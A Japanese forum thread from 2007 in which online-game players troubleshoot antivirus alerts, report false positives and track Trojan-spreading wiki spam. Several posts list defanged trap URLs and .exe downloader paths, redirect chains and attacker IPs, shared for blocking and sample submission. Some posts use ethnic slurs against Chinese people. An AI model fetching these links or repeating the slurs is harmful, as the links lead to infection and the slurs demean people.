もう少しお付き合いをお願いします。 <>
(○口○*)さん<>sage<>07/10/19 08:18 ID:edq1rxM90<> >>332-333の人が親切に自分で調べるようにと促している訳で。
そこまであたりを付けているなら…
D:\System Volume InformationをGoogleあたりで検索すればいいとおもうんだ。 <>
(○口○*)さん<><>07/10/19 18:04 ID:GcHRhq+G0<> レスありがとうございます
>>335のレスでGoogleもにて調べクリーンアップのやり方を知り復元ファイルを消しました。
そこで、再度カスペルのオンラインを使ったのですが、やはり同じ名前と同じ場所にて現れました。
次に、トレンドマイクロオンラインスキャン、BitDefender Free Edition v10
これら二つで検査したのですが二つとも見つけていませんでした。
今度は、あるサイトで紹介していた「AntiVir」をやってみようと思います。
助言などがありましたら教えてください。お願いします <>
(○口○*)さん<>sage<>07/10/19 21:59 ID:rbT/qP+50<> 当てにならないレスですが、
アドウェア入りのソフト群をアンインストール済みで
セーフモードでシステムの復元を無効に設定しなおして再起動しても、
やはり復元されるのでしょうかね?
広告のだから気にしなくてもいいかもしれないけど、
それほど検出されて気持ち悪いなら
カスペル正規版を買ってしまって対処した方が早いような気がします。 <>
(○口○*)さん<>sage<>07/10/19 22:08 ID:kd2prA5U0<> 無効に設定した時点で復元情報がクリアされる気がした <>
(○口○*)さん<>sage<>07/10/20 00:58 ID:xU/o+gBV0<> レスありがとうございます。
Windows Defender キングソフトをしましたが発見されませんでした。
>>337のレスで書かれたとおり買った方が早いですね。
私は、駆除を断念してソフトがアドウェアを対処されるまで待つことにしました。
後、調べたらニフティーが運営してる無料のオンラインスキャン・駆除サービスがあるので
ここのメンテナンスが終わったらやってみようと思います。
いるかどうか分かりませんが、アドレス張っておきます。
ttp://www.nifty.com/security/vcheck/kav/kavwebscan.html
皆さん、付き合ってくださってありがとうございました <>
(○口○*)さん<>sage<>07/10/20 02:19 ID:9qSJb4vBO<> セキュリティー関係は素人なのですが質問です
ネカフェで焼いたDVDの中にウィルスが入っていたようでハードディスクにデータを移している最中にavastが見つけて今ウィルスチェストに入っているのですがこの時点でもう感染しているのでしょうか? <>
(○口○*)さん<>sage<>07/10/20 02:22 ID:9qSJb4vBO<> 忘れていました
ウィルスはTrojan(後は今読めません <>
(○口○*)さん<>sage<>07/10/20 02:55 ID:9qSJb4vBO<> とりあえず現在Googleで調べている所です
Trojan-gen{VC}
でした <>
(○口○*)さん<>sage<>07/10/20 08:48 ID:9qSJb4vBO<> 色々調べた結果どうやらavastの誤認識だったようですm(_ _)m <>
(○口○*)さん<>sage<>07/10/21 15:21 ID:6LFynyVc0<> MPACK関連ネタ。
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20071005/283933/
> MaaSを使用することにより攻撃者は,新たに不正なプログラムを作成することなく,様々な機能を第三者から入手することが可能になる。
〜
>つまり,日本円にして1時間当たり120円程度といった少ない投資で不正なツールを利用し,大量の正規WebサイトにIFRAMEタグを
>埋め込み,悪意のあるWebサイトへアクセスさせることが可能になるのだ。
スクリプトキディの延長線上程度の知識と、些細なコストでマルウェアの大量拡散も可能な時代。
感染報酬アフィリエイト・モデルなど、黒社会ビジネスがネット上でも台頭しつつある。 <>
(○口○*)さん<>sage<>07/10/21 19:12 ID:kg/RuXH50<> セキュリティホールmemoより
Windows 版の RealPlayer 10.5 以前および 11 Beta に 0-day 欠陥。
ActiveX コントロール ierpplug.dll に buffer overflow する欠陥があり、
攻略 Web ページによって任意のコードを実行できる。
既に攻略コードが野に放たれている。
Trojan.Reapall (Symantec)
ttp://www.symantec.com/security_response/writeup.jsp?docid=2007-101600-3044-99
Exploit-RealPlay.a (McAfee)
ttp://vil.nai.com/vil/content/v_143459.htm
パッチが出ているので適用するがよい。
ttp://service.real.com/realplayer/security/191007_player/en/
の「click here」
ttp://service.real.com/realplayer/security/191007_player/en/securitydb.rnx <>
(○口○*)さん<>sage<>07/10/21 19:28 ID:rONGanun0<> これパッチあててもバージョン表記変わらないんだな <>
(○口○*)さん<>sage<>07/10/22 11:03 ID:KZ2T6p3/0<> RealPlayerってまだあったのか <>
(○口○*)さん<>sage<>07/10/23 13:00 ID:USJbteHU0<> ネットラジオとかじゃよく使われてるぞ <>
(○口○*)さん<>sage<>07/10/25 03:45 ID:7+h80eZh0<> FF11でも、いよいよ垢ハック支那の活動が活発化。
業者がパス抜いたキャラの装備売りまくってる
http://live25.2ch.net/test/read.cgi/ogame/1193064710/
中華の行動が規約違反を遥かに通り越してる件2
http://live25.2ch.net/test/read.cgi/ogame/1193171927/ <>
(○口○*)さん<>sage<>07/10/25 07:13 ID:c3Hqn7pB0<> ノートンからカスペに乗り換えたら
ROクライアント周り不審な動きしすぎでワロタ <>
(○口○*)さん<>sage<>07/10/25 07:22 ID:pnMhT8xs0<> 検体提出先情報の追加
パンダセキュリティ→日本代理店からは、製品からの送付方法の案内
他とまとめて送るので、送信先あれば教えてくれと再度質問→スペイン本社から直接返答する
スペイン本社からの英文メール→送られたアドレスをWikiに掲載
ROセキュリティWiki
http://rosafe.rowiki.jp/ <>
(○口○*)さん<>sage<>07/10/25 08:16 ID:lQZeOzTr0<> さて、Meたんでカスペのオンラインスキャンができなくなった訳だが <>
(○口○*)さん<>sage<>07/10/25 09:09 ID:hyXcmYwV0<> 9xMeはもういいんじゃないか…?
それよりノートンとバスターの2008が2000を切った件について。
まだとりあえずMicrosoftの延長サポート期間中なのに orz <>
(○口○*)さん<>sage<>07/10/25 09:29 ID:r3XnOaLO0<> M$からサポート切られてるOSなんて自己責任以上の物があるだろ <>
(○口○*)さん<>sage<>07/10/25 09:41 ID:+CIS1PP90<> 延長 サ ポ ー ト 期 間 中 なのに <>
(○口○*)さん<>sage<>07/10/25 17:21 ID:Felsm8Yd0<> >>349
ROが海外接続ブロックになると手を出しにくいから早めにシフトしたのかね・・・?
耐性ない分被害が凄いっぽいな。 <>
(○口○*)さん<>sage<>07/10/25 18:07 ID:q+KQ5iCH0<> >356
リネやROのプレイヤーが通った道。
むしろ今までFFでハク騒ぎが少なかったほうが、意外ともいえる。
スクエニの場合取締りが活発でGMも仕事をしてるようだし、被害にあっても
どこぞの集金会社よりはマトモな対応してくれるんじゃ? <>
(○口○*)さん<>sage<>07/10/25 18:41 ID:ZvpOA4oo0<> スクエニ対応次第で、また癌を叩くネタが増えるね。 <>
(○口○*)さん<>sage<>07/10/25 20:36 ID:n3xSImhU0<> 最近また一般のWikiとかに福建人どもの攻撃が散見される。
しかもフェイクアドレスを織り交ぜた手法だ。
www■irisdti-jp■com/playonline/(まとめスレにもでてる)
www■irisdtijp■com/playonline/ (フェイク)
フェイクは当然存在しない、登録情報も無い、だからアクセスしても何も起きない。
ぐぐるとフェイクの方は下野新聞社のWiki?に爆撃の痕跡があった、今は削除されている。
(irisdtijp検索でキャッシュから確認可能)
日付は10月22日。
全然ゲームと関係ない場所だけど、”Wiki”キーワードで攻撃をしようとしたのかも。
手作業で間違えたと考えるのは早計、フェイクURLをこれは罠だと書き込むのを期待している節もある。
すぐ思いつくのは禁止語句設定数オーバーを狙ってるのかな?
他に思いつくのは、最近のFF爆撃の所為か最近あちこちのブログなどで罠に注意と言う記事が目立つようになってきた。
ありもしないフェイクを罠だと書き込んだ管理者の信用を失墜させた後に罠をドンドカ書くとかね。
信用されなくなれば罠を踏んでくれるかもと福建連中のことだからそれくらいは考えるか?
ともかくもはやゲームと全く無関係でもサイト内にキーワードを含んでいると危ないな。 <>
(○口○*)さん<>sage<>07/10/25 23:31 ID:woJyAemA0<> カスペオンラインスキャナを使用したところ、ウイルス・疑わしいものの項目は0となり検出されませんでしたが
ウイルス名の欄に「ロックされています」と表示され、前回の処理「スキップ」と表示されています。
そしてファイル名がずらーりと・・・
これは一体どのような状態なのでしょうか?
感染オブジェクト名 ウイルス名 前回の処理
C:\WINDOWS\$NtUninstallQ307274$\shgina.dll ロックされています スキップ
C:\WINDOWS\$NtUninstallQ307274$\spuninst\spuninst.exe ロックされています スキップ
C:\WINDOWS\$NtUninstallQ307274$\spuninst\spuninst.inf ロックされています スキップ
C:\WINDOWS\$NtUninstallQ308676$\msobmain.dll ロックされています スキップ
C:\WINDOWS\$NtUninstallQ308676$\spuninst\spuninst.exe ロックされています スキップ
C:\WINDOWS\$NtUninstallQ308676$\spuninst\spuninst.inf ロックされています スキップ
C:\WINDOWS\$NtUninstallQ308677$\spuninst\spuninst.exe ロックされています スキップ
C:\WINDOWS\$NtUninstallQ308677$\spuninst\spuninst.inf ロックされています スキップ <>
(○口○*)さん<>sage<>07/10/26 00:01 ID:11B/+Yn50<> ぐぐってざっと見たところ、そのファイルが他のプロセスによって使用されているので、
スキャンできませんでした、ということかな?
OS起動直後や、セーフモードにしてスキャンしてみたらスキャンされるかも? <>
(○口○*)さん<>sage<>07/10/26 12:17 ID:gEzsMWvQ0<> アドレスからしてもFF狙ってるなぁ・・・ <>
(○口○*)さん<>sage<>07/10/26 12:24 ID:gEzsMWvQ0<> あ、垢ハックスレに張られた奴ね。 <>
(○口○*)さん<>sage<>07/10/26 23:34 ID:WUn7EMyX0<> FF関係のサイトを見てきたが、凄い混乱が起きてるな。
運営に対してすごいクレームの嵐。
癌叩きが生温く見えるのは、期待の裏返しなのかね?
Maranにしても、今は複数のネトゲのパスを抜くタイプが
多いから、他人事じゃない話なんだがけどねぇ。
たまに見覚えのあるアドレス見かけるし。 <>
(○口○*)さん<><>07/10/26 23:55 ID:PTpuhlGO0<> 下がりすぎてるから上げておきますね〜
こうなると徐々に耐性を付けられたROはまだマシなのだろうか…?
ROで鍛え上げてきた腕をFFで発揮してるような感じ <>
(○口○*)さん<>sage<>07/10/27 00:41 ID:FYMupI7e0<> >>364
ROはGMが都市伝説だったくらいだからなぅ。
癌管理になってからnPro導入→まともに取り締まるまでの期間って
3年くらいあったよね。 <>
(○口○*)さん<>sage<>07/10/27 03:14 ID:h+ksDlJJ0<> >>365
だねぇ。
初期は中華の手口も少なくて徐々に一つ一つ手口を増やしてきたので、
こちらもそれに応じて一つ一つ耐性つけてきたが、
FFの方は中華の手口が完成形になった状態で耐性が無い所に爆撃された訳で、
かなり被害酷そうだ・・・ <>
(○口○*)さん<>sage<>07/10/27 09:09 ID:vNsTzhzx0<> 福建人どもはここに来てまたもライブドアアカウントを複数取得して
一般Wikiの改竄しまくりなども確認されてる。
ゲームと無関係なのにキーワード偵察検索で引っかかったらしく、
改竄されまくって警察に行く方も現れ始めた。
9127.teacup.com/tane_cross/bbs
今までに確認されてるライブドアWiki改竄者ID:
Wikiを始めとしたライブドアアカウントサービス使ってるならブロック推奨
ztylove888
meer_gurni
zb00999
bsskkb528
xoveryelper
ついでにIP(韓国、ボットネット、か串)
220.73.141.216
罠FC2ブログも多数登録し、攻撃陣地構築に入った模様。
要注意。 <>
(○口○*)さん<>sage<>07/10/27 12:12 ID:fmwZId6x0<> >>365
中華トロイで最初に猛威を振るったのは
Legend of MirとかMu奇蹟の大地とかだった気がする。
その次はリネ1やRO、んで今はWoWやリネ2がメイン。
日本だとRO人口が多いのとWoWがあまり流行っていないので
RO・リネ・リネ2が多いかな。FFは前もトロイ騒ぎがあって、
あの時は中華のサーバ書き換えた奴までいたんだけど
引退などで住民結構入れ替わっちゃってるからなぁ。 <>
(○口○*)さん<>sage<>07/10/27 13:59 ID:8YhttJi10<> ライブドアや各所を荒らす福建人、zb00999、アメブロに進出。
ameblo■jp/zb00999/
記事にwikifdiaryへのリンクを書いている。 <>
(○口○*)さん<>sage<>07/10/27 14:19 ID:8YhttJi10<> ↑、diaryじゃ無くてdjary。
それにしてもまた活発になってきて厄介だな。
罠ブログとかには皆でサービス側に苦情を入れていくしかなさそう。
一人で苦情出しても「あなたからしか苦情が無い」とか返してきたり、
クレーマーと思われかねん。 <>
(○口○*)さん<>sage<>07/10/27 17:19 ID:grYzoX1s0<> カスペさんでなんかみつかった
どこで感染したんかなぁ・・・
Troj/LdPinch-FC
スパイウェア型トロイの木馬
名称 Troj/LdPinch-FC
種類 スパイウェア型トロイの木馬
感染の恐れがある OS Windows
副作用 他のユーザーによるコンピュータへのアクセスを可能にする
情報を盗む
さらにマルウェアをドロップする
送信者メールアドレスを偽造する
自身のメール送信エンジンを使用する
インターネットからコードをダウンロードする
キー操作を記録する
自身をレジストリにインストールする
別名 Trojan-PSW.Win32.LdPinch.agy
Trojan.LdPinch-19 <>
(○口○*)さん<>sage<>07/10/27 17:21 ID:grYzoX1s0<> ちなみに感染してる!って言われたファイルはぜんぜん使ってないエミュのファイル
DanteWin\CORPSE\CHR00.DAT
コープスパーティなつかしす <>
(○口○*)さん<>sage<>07/10/27 17:23 ID:grYzoX1s0<> ってまた途中送信orz
問題は他のウィルス検索では反応すらしないってとこ
また誤検知だろうか? <>
(○口○*)さん<>sage<>07/10/27 17:27 ID:+NZPLA1s0<> やっぱりなんか誤検知っぽい
昨日まではひっかからなかったし、バックアップの外付けHDDに入ってた同じファイルにも反応したわ
こういう時ってカスペ側にどうやって報告すればいいんだい? <>
(○口○*)さん<>sage<>07/10/27 17:52 ID:fmwZId6x0<> FalsePositiveと一言書いてzipで固めて送ればいい。 <>
(○口○*)さん<>sage<>07/10/27 18:19 ID:+NZPLA1s0<> 検出されたファイルをかい?
それとも検出したとこのレポート? <>
(○口○*)さん<>sage<>07/10/27 18:24 ID:+NZPLA1s0<> スマン、どっちもだね
どこのページから送ればいいか教えてくだしあ <>
(○口○*)さん<>sage<>07/10/27 19:07 ID:x6GBAwGO0<> FF関連でこれ系の話題が結構話されている場所はどこだろな。余裕があったら
情報&危険アドレス収集がてら覗きに行きたいところだけど…やっぱ2ch回りかねぇ。 <>
(○口○*)さん<>sage<>07/10/27 19:18 ID:8KqpnpQ90<> RO厨くるな、おまえらのせいだなんて言われかねないほど過熱してたらどうしようね <>
(○口○*)さん<>sage<>07/10/27 19:23 ID:fmwZId6x0<> 2chネ実はアドレス集めて検体提出ってレベルにはない。
ただ騒いでるだけ。アドレス収集には役に立たない。
外部板となると壷や蟹、壷は削除人が活発に削除しているので
放置中の蟹がおすすめ。 <>
(○口○*)さん<>sage<>07/10/27 19:25 ID:fmwZId6x0<> >>378
レポートとかいらんよ。
検知したファイルをzipで固めてfalse positiveって書いて
テンプレwiki見てメールで。 <>
(○口○*)さん<>sage<>07/10/27 19:32 ID:AuAhYFGw0<> ありがとうー!
そんなわけで送っておいたよ <>
(○口○*)さん<>sage<>07/10/27 19:44 ID:dM+JpOwR0<> 報告乙だが、エミュは関心しねーな。とっとと削除しる。 <>
(○口○*)さん<>sage<>07/10/27 19:48 ID:FYMupI7e0<> コープスパーティといえばPC用RPGツクールDANTE98を使用した傑作ゲーなので
多分PC98のエミュのことだと思うよ。 <>
(○口○*)さん<>sage<>07/10/27 20:25 ID:dM+JpOwR0<> そいつは失礼した。誤解した事をお詫びする。
PC98用のエミュレーターは猫プロジェクトの奴しか使った事なくて気づかなかったよ。 <>
(○口○*)さん<>sage<>07/10/27 20:35 ID:ZcqpGxOV0<> 決め付け厨氏ね <>
(○口○*)さん<>sage<>07/10/27 20:42 ID:fmwZId6x0<> もちつけ <>
(○口○*)さん<>sage<>07/10/27 21:20 ID:Pa89l7Yo0<> コープスパーティのファイルをトロイだと誤認知してるわけか <>
(○口○*)さん<>sage<>07/10/27 21:55 ID:AuAhYFGw0<> もう修正されたみたいです
助言くれた方ありがとうー <>
(○口○*)さん<>sage<>07/10/27 23:01 ID:AuAhYFGw0<> ちなみに返信がきてたので貼っておきます
Hello, yes it is a false alarm. Will be fixed in the next update.
-- Best regards, Shvetsov DmitryVirus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.comhttp://www.kaspersky.com/ >
Attachment: FalsePositive.zip > false positive Always thank you. <>
(○口○*)さん<>sage<>07/10/28 01:15 ID:KD+LtqXK0<> AntiVirだと提出フォームで誤検知か有害ファイルか指定できたりする(「File Type」)。
フォームでこの形式はちょっと他では見たことがない(そんなに多いんか?)。
ttp://analysis.avira.com/ <>
(○口○*)さん<>sage<>07/10/28 01:56 ID:KD+LtqXK0<> いつの間にかVirusTotalが日本語化されてた。
ttp://www.virustotal.com/jp/
あまり変わった気がしないけどw <>
(○口○*)さん<>sage<>07/10/28 10:01 ID:gva3hdG20<> もう中韓全部弾いてもいいかな <>
(○口○*)さん<>sage<>07/10/28 10:21 ID:aY44M8AM0<> >>394
M/Bメーカーとかも軒並みアウトになるのだが。
PG2で中国・韓国・台湾を弾く設定にして、必要な所だけ個別で解除していくのが正しい設定かと。 <>
394<>sage<>07/10/28 11:02 ID:gva3hdG20<> 【韓国 中国】PeerGuardian 18【YBBを弾こう】
ttp://tmp6.2ch.net/test/read.cgi/download/1193064423/l50
を参考にやってみました
rir_alloc_004.zipを使用、batを右クリ編集で
rir_alloc -e -s -c -p "deny:" KR CN HK > 071028deny_out+arin.txt
PG2でリスト管理→追加→ファイル指定(ブロック)
あとは必要に応じて解除
ガイシュツだったらすんません
国内鯖だったら意味ないんだろうなぁ <>
(○口○*)さん<>sage<>07/10/28 11:25 ID:nR1+QRfI0<> 現在進行形でLydia板にアカハクURLが爆撃されてる状態。
URL自体はまとめサイトの5月19日登録分をとっかえひっかえして来てるから既存の物っぽいけれど、
各鯖板等をめぐるときは注意してください。
爆撃で使われたURL
・www■samples112xrea■com/roblog/
・www■raginfoy■com/roblog/
・www■rentalbbs-livedoor■com/roblog/ <>
(○口○*)さん<>sage<>07/10/28 12:31 ID:KD+LtqXK0<> >>395
Wikipediaが見られないと騒いだ奴もいたな。 <>
(○口○*)さん<>sage<>07/10/28 12:43 ID:KD+LtqXK0<> >>397
3つともIP同じで
www■raginfoy■com/roblog/3.exe <>
(○口○*)さん<>sage<>07/10/28 13:25 ID:aY44M8AM0<> >>399
Maran.ff 有名所は軒並み検知。
VirusTotalですり抜けたのは、<FileAdvisor>のみ。
以前に提出した検体と同じ種類なので、検体提出はしないでおきます。 <>
(○口○*)さん<>sage<>07/10/28 15:57 ID:a2rvQrY50<> 最近の福建人はこのIPでWikiや掲示板に無差別攻撃をかけているようだ。
220■73■141■216 (韓国)
乗っ取ったPCか串か。
このIPをぐぐると200件以上ヒット。
掲示板、ブログ、Wiki持ちは要規制ホスト。 <>
(○口○*)さん<>sage<>07/10/28 16:48 ID:y1SWEz7a0<> すいません、相談させていただけませんか。
【 気付いた日時 】 10月28日
【不審なアドレスのクリックの有無 】 踏んだ記憶はありませんが・・・。
【 アドレス 】
【 OS 】 Windows XP Home Edition Version 2002 Service Pack2
【使用ブラウザ 】 FireFox 2.0.0.8 更新のお知らせが来たときには更新しています
【WindowsUpdateの有無】 自動更新していますが、1週間ほど前にチェックしました
【 アンチウイルスソフト 】 McAfee Security Center
【その他のSecurty対策 】
【 ウイルススキャン結果】 McAfeeで何も発見されず
【テンプレの参考サイトを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
今回のROカムバックキャンペーンでクライアントを再インストールして復帰したところ、
クライアント終了時にMcAfeeのSystemGuardsとスパイウェア対策が「問題が発生したため終了します」と表示され、
無効になってしまいます。
BSwikiを見ると、対策ソフトを落とすタイプのスパイウェアもあるようですが、感染していると考えたほうがいいでしょうか。 <>
(○口○*)さん<>sage<>07/10/28 17:44 ID:QVbwI+Bv0<> >>402
マカフィとRO(nPro)って相性どうだったかな・・・
とりあえずカスペのオンライスキャン試してみるといいよ(`・ω・´) <>
(○口○*)さん<>sage<>07/10/28 19:29 ID:KD+LtqXK0<> >>401
mini_httpd/1.19
なんか乗っ取られてるっぽいね。 <>
(○口○*)さん<>sage<>07/10/28 19:36 ID:KD+LtqXK0<> アクセスすると「testtesttest(略)testtesttest」w <>
(○口○*)さん<>sage<>07/10/28 20:12 ID:HqIh36fd0<> >401
そのIPでググって、とあるWikiの履歴から発掘。
A)
tinyurl■com/2tqkz2
->www■articlelin■com/fc2/index■htm
--->www■articlelin■com/fc2/wz■htm
--->www■articlelin■com/fc2/wu■htm
----->www■articlelin■com/fc2/music■htm
----->www■articlelin■com/fc2/love■htm
------->www■seakinfo■com/fc2/cery■exe
B)
tinyurl■com/2k4kb8
->www■teamerblog■com/play/index■htm
中略
------->www■teamerblog■com/play/test■exe
他にも無数のURL短縮サービスで罠リンク書き換えがあった。
全部は調べてないが、上2つのファイル置き場は61■139■126■16。
以前にもあった気がするが、URL短縮サービス使われるとヤバいねぇ。
それにYouTubeやニコとかに酷似したドメイン名で短縮サービスや
罠サイトを開かれると、間違えて踏む人が出てきそう。 <>
(○口○*)さん<>sage<>07/10/28 23:17 ID:y1SWEz7a0<> >>403
ありがとうございます。
スキャンしたところ、スパイウェアはなかったのですが、
Janeのdat fileにExploit.Html.mhtが発見され、削除できました。
しかしこのJane、もとから感染していたということになるんでしょうか。
そのファイルは更新日時が2005年となっていましたが、
DLしたのは今年の1月だったので。 <>
(○口○*)さん<>sage<>07/10/28 23:20 ID:VX2BeWNE0<> それは特定の文字列が、たまたま一致しただけだと思う
datファイル自体は、ただのテキストだしウイルス活動しようがないし <>
(○口○*)さん<>sage<>07/10/28 23:48 ID:QVbwI+Bv0<> うちもJaneのでるけど問題ないよ
カスペで検出ないならたぶん大丈夫
心配ならOS再インストールだー <>
(○口○*)さん<>sage<>07/10/28 23:50 ID:y1SWEz7a0<> >>408
>>409
わざわざありがとうございます。
McAfeeが落ちるのは相性の問題なんでしょうか。
エラー報告はしておこうと思います。
最近重くなってきた気もするので、再インストールも検討しようと思います。 <>
(○口○*)さん<>sage<>07/10/28 23:59 ID:pjcbGZSb0<> うちはノートンだからよくわからないけど
使ってるマカのソフト名とVerの記載ないとあれだが
ここのスレ住人でマカ使ってる人いたらいいね
RO終了時に頻繁にエラー出るなら相性悪い可能性もある <>
(○口○*)さん<>sage<>07/10/29 02:23 ID:s+BOrBb30<> リネージュ資料室の人がMcAfee使いで検体送ってくれてるから
RO・リネ用中華トロイは結構対応されていたりする。 <>
(○口○*)さん<>sage<>07/10/29 18:17 ID:2tekCBUw0<> 「Adobe Reader 8.1」などの脆弱性を突くトロイの木馬が日本上陸
http://internet.watch.impress.co.jp/cda/news/2007/10/29/17325.html
今のところは、日本ではあまり影響ないみたいだけど、AdobeReaderのアップデートしときましょう。 <>
(○口○*)さん<>sage<>07/10/29 21:30 ID:S/jySHJh0<> Adobe Readerも、Acrobat Readerから改名してから特に、重量化傾向と、ブラウザプラグインとしての行儀の悪さが目につく。
Foxit Readerなど、互換ソフトの導入を考えるのも一つの手。 <>
(○口○*)さん<>sage<>07/10/29 21:32 ID:C+q85cxF0<> マカフィー使ってます。
・SecurityCenter→ver. 7.2
・VirusScan→ver. 11.2
・Personal Firewall→ver. 8.2
PC自体が4年使っているノートでスペックがギリギリなので、
マカフィーのmcshield.exeエラーで何かが終了するのはよく起こりますが、
SystemGuardとスパイウエア対策に問題があって落ちたことはないです。
ROに限って落ちるということもないです。
今年の5月頃に更新が来てからすごく動作が重たくなったので、宥めつつ
使ってる感じ。
あんまり参考にならなくてすみません。 <>
(○口○*)さん<>sage<>07/10/29 22:43 ID:Wqxi1UFM0<> >>414
ウチの勤務先なんてAdobe Reader 8系使用禁止の社長通達あるぜ。
使うのはVer7のみ使えとのことだ(先月の話だ)。 <>
(○口○*)さん<>sage<>07/10/29 22:50 ID:GIYOW2nm0<> さて福建人どもがまた某地方新聞社のWikiに爆撃かましたみたいだ。
ttp://www.shimotsuke.co.jp/media/wiki/wiki.cgi?page=ff11+new+wiki
完全に標的になっちゃったな。 <>
(○口○*)さん<>sage<>07/10/30 00:34 ID:z9oAtfdE0<> 地元の新聞のWikiじゃねーか <>
(○口○*)さん<>sage<>07/10/30 00:37 ID:Bx0lKQSF0<> >>415
落ちるといっていた本人です。
McAfeeのverに関してはまったく同じです。
PCはdynabookのSatellite AW6を使っています。
2006年の12月に購入しました。
スペック的には大丈夫だとは思うんですが・・・。 <>
415<>sage<>07/10/30 01:38 ID:bWxCxlYC0<> >>402,419
自分は実はROMしてるだけ+PCに詳しくないので
とりあえず、"ROだけ相性悪い"という落ち方はしてない、
あとはシステムガードとスパイウエアだけが落ちるということはない、
という情報しか出せないです、ごめんなさい。
個人的には、nProと競合しているような感じはします。
解決するのかわからないけど、マカフィーに問い合わせるのもいいかと思います。
参考までにノートPCは
NEC Lavie LL750/7
Movile Intel(R) Celeron(R) CPU2.00GHz
メモリ 894MB RAM
グラフィック
RADEON IGP 340M メモリ合計128.0MB
です。 <>
(○口○*)さん<>sage<>07/10/30 07:55 ID:S0ZfKIoP0<> 福建人のWiki無差別爆撃IP
ie6xpでぐぐったら出た物、もう少し時間が経てばキャッシュが浸透してIP&爆撃地点増えるかも。
220.162.104.42
222.78.84.227
222.78.80.28
全部福建IP
爆撃地点が石垣島Wikiとかもう明らかに無差別化してる。
単に日本語ページのwikiをキーワード検索してるとしか思えない。
【爆撃された石垣島Wiki】
ttp://wiki.ishigaki.cc/index.php?title=%E3%83%A1%E3%82%A4%E3%83%B3%E3%83%9A%E3%83%BC%E3%82%B8 <>
(○口○*)さん<>sage<>07/10/30 10:14 ID:4pOD4qnS0<> 多いねぇ。
検索キーワードで「ie6xp」「irisdti-jp」ならいいけど「www■ie6xp■com」でぐぐろうとすると
そのページを開こうとしてしまうので要注意。(さっきやった orz)
直せなかったとこ。
ttp://jidou-link.com/business/site.php?name=Yukke%81%9A
開かれるページは、難読化されたJavaScript。VBスクリプトが埋め込まれているのだが
落とそうとする実体は、わかんないのでパス。 <>
(○口○*)さん<>sage<>07/10/30 10:22 ID:4pOD4qnS0<> 貼られまくってるアドレス
http://www■ie6xp■com/playonline/
http://www■ie6xp■com/web/
http://www■ie6xp■com/linonline/
http://www■irisdti-jp■com/playonline/
追記、NOD32はこのダウンローダをすり抜けます。ご注意を。
(DLしようとする本体はどうなのかな)
Virustotalにかけると、カスペも含めて全部すり抜け…出掛ける前に検体提出するかなー。 <>
(○口○*)さん<>sage<>07/10/30 10:26 ID:pGdEClLy0<> >>413
当方にも英文SPAMがバンバン飛んできてます。
ttp://www.itmedia.co.jp/enterprise/articles/0710/29/news013.html
RealPlayer。
ttp://www.itmedia.co.jp/enterprise/articles/0710/29/news012.html
パッチ配布場所(今回のパッチはまだ…)。
ttp://service.real.com/realplayer/security/ja/ <>
(○口○*)さん<>sage<>07/10/30 10:37 ID:pGdEClLy0<> >>423
スクリプトは検知しなくてもいいよ。
バイナリ阻止してくれれば。
今拾ってるので待ってて。 <>
(○口○*)さん<>sage<>07/10/30 10:51 ID:pGdEClLy0<> www■ie6xp■com/playonline/dsgdf.exe
www■ie6xp■com/linonline/st.exe
www■ie6xp■com/web/svch.exe
st.exeが苦手な模様。
Norton、McAfee、バスター、Kaspersky、AntiVirに送付済み。 <>
(○口○*)さん<>sage<>07/10/30 10:56 ID:4pOD4qnS0<> >>425-426
Thx 検体入手したら、他に送っておくよ。
このアドレス、総合スレに転記した方がよくね? <>
(○口○*)さん<>sage<>07/10/30 11:03 ID:s0Nb2u230<> あとは、向こう側の最前線(?)は、どうしたものか。
こういったものの転記が受け入れられるだけの土壌が出来上がっているか未知数。
RMT業者の垢ハックが多発している件6くらい
ttp://live25.2ch.net/test/read.cgi/ogame/1193656980/ <>
(○口○*)さん<>sage<>07/10/30 11:18 ID:pGdEClLy0<> >>428
無理だと思う。業者乙wwwとか煽られるのがオチ。 <>
(○口○*)さん<>sage<>07/10/30 11:25 ID:4pOD4qnS0<> >>428
タイトルはアレだが、まとめの転記なら、業者プレイヤー関係無いけどな。
■まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり)
http://ort.sakura.ne.jp/taisai/
にある、ネ実用テンプレの
■警察への通報方法
■警察へ行く際に持っていく・用意しておくもの
は、一部修正してここで利用できそうな気がする。 <>
(○口○*)さん<>sage<>07/10/30 12:19 ID:pGdEClLy0<> Kaspersky
st.exe Trojan.Win32.Inject.ix <>
(○口○*)さん<>sage<>07/10/31 09:55 ID:aW3HqQSB0<> 総合スレ>820-822
1つ賢くなったぜ。トレンドマイクロの奴だと思ってたよ。 <>
(○口○*)さん<>sage<>07/10/31 10:43 ID:e2H9alRw0<> 福建人の罠ドメインの一つ、wikifdiaryは恐らくこれの錯誤を狙ったものだろう。
【fdiary.net wikifarm】
wiki.fdiary.net
あらそっくり。
このサービスのWikiも幾らか爆撃を喰らってるし。
ie6xpもGoogleキャッシュに浸透してきて日本語ページのみで500件くらいヒットするようになった。
だがそろそろ罠ドメインをローテーションすると思われる。 <>
(○口○*)さん<>sage<>07/10/31 11:01 ID:OZj9Z+xd0<> >432
ウィルスバスターは日本でのトレンドマイクロ社の製品名。
VirusBusterはハンガリーの企業の製品。
バスターは海外では PC-cillin という名称で、VirusTotalで使われてるVirusBusterは
こっちのハンガリーの方。
VirusTotalはバスターは対応してないはず。
バスター(PC-cillin)は日本では御三家の1つだが、は海外では日本ほどは普及してない。 <>
(○口○*)さん<>sage<>07/10/31 12:17 ID:e2H9alRw0<> またwikifdjaryのiとjを間違えた、紛らわしいたらありゃしない。
PC-CillinはマザボのCDに収録されてくることが多い。
俺が買ったマザボには全部ついてた。
おまけ程度と思われてることもあって普及してないのかもね。 <>
(○口○*)さん<>sage<>07/10/31 13:35 ID:aW3HqQSB0<> >総合スレ823
未検出なら、日本ではマイナーなとこでも関係なしに検体提出してるけどさ、
そろそろこっちに移動しようよ。 <>
(○口○*)さん<>sage<>07/10/31 13:56 ID:v0YIWxPF0<> ラグナロクが起動するウィルス対策ソフトについて教えて下さい。
【 気付いた日時 】 2007/10/下旬
【不審なアドレスのクリックの有無 】 無し
【 アドレス 】 無し
【 OS 】 Windows 2000 SP4
【使用ブラウザ 】 Firefox 2.0.0.8
【WindowsUpdateの有無】 一番最後は2007/10月上旬。現在見ても残っている物は無い。
【 アンチウイルスソフト 】 これについて相談したい。
【その他のSecurty対策 】 Spybot S&D Ver1.4、ルータあり
